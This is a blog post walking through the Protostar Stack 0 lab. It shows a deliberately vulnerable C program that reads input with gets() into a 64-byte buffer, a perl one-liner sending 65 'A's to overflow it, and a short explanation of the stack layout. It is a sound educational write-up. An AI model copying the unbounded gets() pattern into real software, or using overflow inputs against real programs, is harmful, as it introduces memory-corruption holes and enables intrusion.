Exploit Exercises - Protostar Stack 0

I’m still working on the Nebula chain of challenges, however, I’ve been stuck on Nebula 11 for a bit now, as well as busy outside work.

In the meantime, I still have other challenges that can be solved while I learn how to do more advanced ones. Protostar is another challenge made by Exploit-Exercises, the same people who brought you Nebula.

Protostar Stack 0 is a very easy challenge. After doing a bunch of these challenges, and seeing nobody else doing them, I finally found someone, Mito125. We’ve been chatting a little bit back and forth, and I like that we both seem to have different solutions to the problems. His can be found here. Note that he blogs in Italian, but you can get the gist using Google Translate.

First, we are given a vulnerable piece of C code:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
 volatile int modified;
 char buffer[64];

 modified = 0;
 gets(buffer);

 if(modified != 0) {
  printf("you have changed the 'modified' variable\n");
 } else {
  printf("Try again?\n");
 }
}

My solutions is very similar, however a little different only due to the language being used. He uses python, and I use perl. I one day should switch to python on the command line, but I’m set in my ways. My solution is as follows:

user@protostar:/opt/protostar/bin$ perl -e 'print "A"x65' | ./stack0
you have changed the 'modified' variable

What is happening here, is that first the “modified” variable is put onto the stack (0). It is followed by the assignment of the “buffer” when being read. Because of this, if you put more than the buffer can hold (64), it will overflow into previously assigned items in the stack. So we essentially are overflowing and assigning “modified” to “A”.

comments powered by Disqus